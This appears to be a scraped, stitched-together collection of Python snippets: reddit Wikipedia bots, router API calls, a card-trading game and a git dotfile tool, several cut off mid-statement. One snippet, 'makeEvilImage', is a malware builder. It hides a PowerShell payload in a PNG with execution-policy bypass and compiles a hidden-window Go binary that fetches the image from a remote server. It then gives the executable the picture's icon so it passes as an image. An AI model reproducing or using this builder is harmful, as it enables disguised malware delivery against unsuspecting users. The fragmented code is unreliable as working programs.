        handle = open(target_path, "a+")
        if options.append:
            handle.write("\n\n")  # Make appending prettier
    elif options.replace:
        handle = open(target_path, "w+")
    elif target_file_exists:
        # Backup the existing file and then write the new file
        util.warn("A file already exists at %s! Moving it to a backup at: %s"
                  % (target_path, backup_path))
        util.backup_file(target_path)
        handle = open(target_path, "w+")
    else:
        util.exit_runtime_error("Please file a bug.",
                                "(File download doesn't seem to cover all option cases)")

    logging.debug("(Outfile, Destination, Target)\n -- (%s, %s, %s)"
                  % (outfile, destdir, target_path))

    handle.write(contents)
    util.success("Downloaded %s to %s." % (filename, target_path))
Example 40
def makeEvilImage(img):
    info("Generating Image...")
    command = 'powershell -noprofile -executionpolicy bypass "Import-Module .\\res\\Invoke-PSImage.ps1; Invoke-PSImage -Script {0} -Image {1} -Out .\\dist\\{2}"'
    if not os.path.isdir('./dist'):
        os.makedirs('./dist')
    payload = ".\\tmp\\payload.ps1"
    outimg = img.split('.')
    outimg = outimg[0] + ".png"
    proc = subprocess.Popen(command.format(payload, img, outimg),
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            shell=True)
    data = proc.communicate()[0]
    data = data.decode('utf-8').replace('\n', '')
    success("Done - Image is .\\dist\\{0}".format(outimg))
    info(
        "Upload .\\dist\\{0} to a Webserver - NO IMGHOSTS SINCE THEY COMPRESS THE IMG"
        .format(outimg))
    host = input("Direct Link: ")
    info("Reading Go Template")
    with open('./res/bin.go', 'r') as p:
        go_file = p.read()
    go_file = go_file.replace('<urlhere>', host)
    go_file = go_file.replace('<filename>', outimg)
    go_file = go_file.replace('<psimage_output>', data)
    bitmap_path = os.getcwd() + '\\dist\\' + outimg
    go_file = go_file.replace('"{0}"'.format(bitmap_path), '$path')
    info("Building Go Binary")
    with open('./tmp/bin.go', 'w') as f:
        f.write(go_file)
    proc = subprocess.Popen(
        'go build -ldflags="-s -w -H=windowsgui" .\\tmp\\bin.go',
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        shell=True)
    success("Build Binary")
    time.sleep(5)

    #Change Icon
    icon = Image.open(img)
    icon.save('./tmp/icon.ico', sizes=[(255, 255)])
    subprocess.Popen('.\\res\\rcedit.exe bin.exe --set-icon .\\tmp\\icon.ico',
                     stdout=subprocess.PIPE,
                     stderr=subprocess.PIPE,
                     shell=True)
    time.sleep(2)
    success("Icon Changed")
    shutil.copyfile("bin.exe", ".\\dist\\" + outimg + ".exe")
    os.remove("bin.exe")
    info("Your file is .\\dist\\{0}.exe".format(outimg))
    success("KTHXBYE")
def load_data(): #TODO load allowed subreddits
  try:
    global banned_users
    banned_users = [line.strip() for line in open('banned_users')]
    global badsubs
    badsubs = [line.strip() for line in open('badsubs')]
    global already_done
    already_done = [line.strip() for line in open('already_done_dump')]
    with open('totalposted') as f:   #TODO replace pickle with simple write store in one file called stats
      global totalposted
      totalposted = pickle.load(f)
    with open ('imgur_client_id', 'r') as myfile:
      global imgur_client_id
      imgur_client_id=myfile.read()
    with open ('userpass', 'r') as myfile:
      global userpass_lines
      userpass_lines=myfile.readlines()
    success("DATA LOADED")
  except:
    file_warning()
    exit()
Example 42
def crawl_reddit():
    already_done = []
    while True:
        already_done=pickle.load(open("stories","r+"))
        for sub in subs:
            for submission in r.get_subreddit(sub).get_new(limit=50):
                if submission.id not in already_done:
                    log("New story: "+sub+" "+submission.short_link+" "+submission.url)
                    already_done.append(submission.id)
                    raw = get_raw(submission.url)+" "+submission.title+" "+submission.selftext
                    tokens = tokenize(raw)
                    victims = find_legislators(tokens)
                    if len(victims) != 0 and should_comment(tokens):
                        success("Found {0} congressfolk!".format(len(victims)))                        
                        if len(victims) < MAX_SINGLE: 
                            add_single_comment(submission,victims)
                            success("Added comment")
                        else:
                            add_multiple_comments(submission,victims)
                            success("Added multiple comments")
                    pickle.dump(already_done,open("stories","r+"))
       #TODO make pickle filter out anything over an hour old or
       #something?  Or make it only look back for the last 30 seconds
       #of posts?
        time.sleep(30)
Example 43
 def set_qos_band_limit(self, download=-1, upload=-1):
     if (download < 0 and upload < 0):
         return fail("Please send me valid download and/or upload")
     payload = {"manual": 1}
     if (download >= 0):
         payload['download'] = download
     if (upload >= 0):
         payload['upload'] = upload
     req = requests.post(self.endpoint_url + "/api/misystem/set_band",
                         payload)
     if (req.status_code == 200 and req.json()['code'] == 0):
         return success("QoS limits have been set!", data=req.json())
     return fail("There was an error while setting the bandwidth")
Example 44
    def get_wifi_detail(self):
        req = requests.get(self.endpoint_url +
                           "/api/xqnetwork/wifi_detail_all")
        if (req.status_code == 200):
            data = req.json()
            #Setting a ref to "wifiIndex" which can be used for setting the wifi status in the set_wifi method
            for i, wifi_interface in enumerate(data['info']):
                wifi_interface['wifiIndex'] = i + 1
            return success(message="Wifi interfaces retrieved!", data=data)

        return fail(
            message="There was an error while getting the Wifi details...",
            data=req.content)
Example 45
 def accept(self, p2_trades: List[TradingCard]) -> Dict:
     self.p2_trades = p2_trades
     if sorted(self.wants) != sorted([tc.card.name for tc in p2_trades]):
         return util.error("Did not send cards requested")
     # Add cards to temporary pending
     p1_pending: List[Card] = [tc.card for tc in self.p2_trades]
     p2_pending: List[Card] = [tc.card for tc in self.p1_trades]
     # Remove cards from location
     [tc.remove_from_location() for tc in self.p1_trades + self.p2_trades]
     # Add cards to actual pending
     self.p1.pending_cards += p1_pending
     self.p2.pending_cards += p2_pending
     return util.success("Successfully traded cards")
Example 46
def save_device_detail(device):
    devices = list(db.devices.find())
    if (device.mac in [d['mac'] for d in devices]):
        query = {"mac": device.mac}
        device_mongo = device.statistics
        device_mongo['time'] = time.time()
        dev = db.devices.update_one(query,
                                    {"$push": {
                                        "details": device.statistics
                                    }})
        # dev = db.devices.find_one(query)
        # print(dev)
        return util.success('Device pushed')
    else:
        device_mongo = device.to_dict()
        device_mongo['details'] = []
        insert = db.devices.insert_one(device_mongo)
        if (insert):
            print(insert)
            return util.success('Device added successfully')
        else:
            return util.fail('Cannot add device')
Example 47
    def play_card(self, player: Player, field: Field, card: Card) -> Dict[str, str]:
        '''
        Plays card from anywhere
        '''
        # Add card to field, if fails, cash in and try again
        if not field.add_card(card):
            self.cash_in(field, player)
            if not field.add_card(card):
                return util.error("Cannot add card to field")

        # Move stage forward if playing from hand
        if self.stage_index in (0, 1):
            self.go_next_stage()   
        return util.success('Card successfully played')
r = praw.Reddit("autowikiabot by /u/acini at /r/autowikiabot")
excludekeyword = "leave me alone"
includekeyword = "follow me again"
global banned_users

### Login
with open ('datafile.inf', 'r') as myfile:
    datafile_lines=myfile.readlines()
USERNAME = datafile_lines[0].strip()
PASSWORD = datafile_lines[1].strip()

Trying = True
while Trying:
        try:
                r.login(USERNAME, PASSWORD)
                success("LOGGED IN")
                Trying = False
        except praw.errors.InvalidUserPass:
                fail("WRONG USERNAME OR PASSWORD")
                exit()
        except Exception as e:
          fail(e)
          time.sleep(5)

### Load saved data
try:
  banned_users_page = r.get_wiki_page('autowikiabot','userblacklist')
  banned_users = banned_users_page.content_md.strip().split()
  deleted = 0
  success("DATA LOADED")
except Exception as e:
	    sectionname = sectionname.replace('\\','')
	  sectionname = sectionname.strip().replace('.','%')
	  sectionname = urllib.unquote(sectionname)
	  bluelog("TOPIC: %s"%filter(lambda x: x in string.printable, pagename))
	  bluelog("LINKS TO SECTION: %s"%filter(lambda x: x in string.printable, sectionname))
	  try:
	    page = wikipedia.page(pagename.encode('utf-8','ignore'),auto_suggest=False)
	    section = page.section(sectionname.encode('utf-8','ignore'))
	    if section == None or str(section.encode('utf-8','ignore')).strip() == "":
	      raise Exception("SECTION RETURNED EMPTY")
	    sectionname = sectionname.replace('_',' ')
	    link = page.url+"#"+sectionname
	    link = link.replace(')','\)')
	    page_url = page.url.replace(')','\)')
	    section = section.replace('\n','\n\n>')
	    success("TEXT PACKAGED")
	    section = truncate(section,3500)
	    comment = ("*Here's the linked section ["+sectionname+"]("+link+") from Wikipedia article ["+page.title+"]("+page_url+")* : \n\n---\n\n>"+section+"\n\n---\n\n[^(about)](http://www.reddit.com/r/autowikibot/wiki/index) ^| *^(/u/"+post.author.name+" can reply with 'delete'. Will also delete if comment's score is -1 or less.)*  ^| ^(**To summon**: wikibot, what is something?)")
	    post_reply(comment,post)
	  except Exception as e:
	    #traceback.print_exc()
	    warn("SECTION PROCESSING: %s"%e)
	    continue
	  continue
	
	
	
	### fetch data from wikipedia
	
	url = ("http://en.wikipedia.org/w/api.php?action=query&titles="+url_string_for_fetch+"&prop=pageprops&format=xml")
	try:
  
  
  success("DATA SAVED")

with open ('datafile.inf', 'r') as myfile:
  datafile_lines=myfile.readlines()

### Login
r = praw.Reddit("halowikibot by /u/jmouer at /r/halowikibot")
USERNAME = datafile_lines[0].strip()
PASSWORD = datafile_lines[1].strip()
Trying = True
while Trying:
    try:
        r.login(USERNAME, PASSWORD)
        success("LOGGED IN")
        Trying = False
    except praw.errors.InvalidUserPass:
        fail("WRONG USERNAME OR PASSWORD")
        exit()
    except Exception as e:
        fail("%s"%e)
        time.sleep(5)
    
def is_summon_chain(post):
  if not post.is_root:
    parent_comment_id = post.parent_id
    parent_comment = r.get_info(thing_id=parent_comment_id)
    if parent_comment.author != None and str(parent_comment.author.name) == 'USERNAME':
      return True
    else:
      return False
  time.sleep(1)

  success("DATA SAVED")

with open ('datafile.inf', 'r') as myfile:
  datafile_lines=myfile.readlines()

### Login
r = praw.Reddit("autowikibot by /u/acini at /r/autowikibot")
USERNAME = datafile_lines[0].strip()
PASSWORD = datafile_lines[1].strip()
Trying = True
while Trying:
    try:
        r.login(USERNAME, PASSWORD)
        success("LOGGED IN")
        Trying = False
    except praw.errors.InvalidUserPass:
        fail("WRONG USERNAME OR PASSWORD")
        exit()
    except Exception as e:
        fail("%s"%e)
        time.sleep(5)
    

def post_reply(reply,post):
  global totalposted
  try:
    reply = "#####&#009;\n\n######&#009;\n\n####&#009;\n"+reply
    post.reply(reply)
    totalposted = totalposted + 1
load_data()
r = praw.Reddit("autowikibot by /u/acini at /r/autowikibot")
im = pyimgur.Imgur(imgur_client_id)
linkWords = ['://en.wikipedia.org/wiki/', '://en.m.wikipedia.org/wiki/']
endoflinkWords = ['\n', ' ', '/']
pagepropsdata = ""
  
### Login
USERNAME = userpass_lines[0].strip()
PASSWORD = userpass_lines[1].strip()

Trying = True
while Trying:
    try:
        r.login(USERNAME, PASSWORD)
        success("LOGGED IN")
        Trying = False
    except praw.errors.InvalidUserPass:
        fail("WRONG USERNAME OR PASSWORD")
        exit()
    except Exception as e:
        fail("%s"%e)
        time.sleep(5)
	
while True:
  try:
    #comments = r.get_comments("all",limit = 1000)
    #for post in comments:
    for post in praw.helpers.comment_stream(r,'all', limit = None):
      
      ### check if comment has links quotes or is previously processed
Example 53
            # shutil.copytree doesn't overwrite an existing directory
            if os.path.isdir(path_in_repo):
                shutil.rmtree(path_in_repo)
            shutil.copytree(source_path,
                            os.path.join(tmp_repo, basename))
    except IOError, e:
        util.exit_runtime_error(
            "Error while trying to move contents to the git repository: %s" % e)

    os.chdir(tmp_repo)
    util.info("Adding files to git repository...")
    if not util.exec_cmd_status("git add %s" % basename):
        util.exit_runtime_error("Failed to add files to git repository")

    util.info("Committing to git repository...")
    (status, output) = util.exec_cmd_output(
        "git commit -m \"%s\"" %
        ("[grabrc-client] %s" % (options.message or source_path)))
    if not status:
        util.exit_runtime_error("Failed to commit files: %s" % output)

    util.info("Pushing to Github...")
    (status, output) = util.exec_cmd_output("git push")
    util.info("[git push] %s" % output)
    if not status:
        util.exit_runtime_error("Failed to push to the git repository.")
    else:
        util.info("Push successful.")

    util.success("Saved %s to Github." % source_path)

  success("DATA SAVED")

with open ('datafile.inf', 'r') as myfile:
  datafile_lines=myfile.readlines()

### Login
r = praw.Reddit("autowikiabot by /u/timidger at /r/autowikiabot")
USERNAME = datafile_lines[0].strip()
PASSWORD = datafile_lines[1].strip()
Trying = True
while Trying:
        try:
                r.login(USERNAME, PASSWORD)
                success("LOGGED IN")
                Trying = False
        except praw.errors.InvalidUserPass:
                fail("WRONG USERNAME OR PASSWORD")
                exit()
        except Exception as e:
          fail("%s"%e)
          time.sleep(5)

def is_summon_chain(post):
  if not post.is_root:
    parent_comment_id = post.parent_id
    parent_comment = r.get_info(thing_id=parent_comment_id)
    if parent_comment.author != None and str(parent_comment.author.name) == 'autowikiabot':
      return True
    else:
      return False
Example 55
def file_warning():
  fail("One or more of data files is not found or is corrupted.")
  log("Have them configured as follows:")
  log("totaldeleted - Create empty file if running for first time.")
  log("banned_users - Create empty file if running for first time. Bot will add banned users automatically. Add manually on separate lines.")
 
### Load saved data
try:
  banned_users = [line.strip() for line in open('banned_users')]
  shared.set('banned_users',banned_users)
  with open('totaldeleted') as f: #TODO replace pickle
      deleted = pickle.load(f)
  with open ('userpass', 'r') as myfile:
    lines=myfile.readlines()
  success("DATA LOADED")
except:
  file_warning()
  exit()



### Login
USERNAME = lines[0].strip()
PASSWORD = lines[1].strip()

Trying = True
while Trying:
        try:
                r.login(USERNAME, PASSWORD)
                success("LOGGED IN")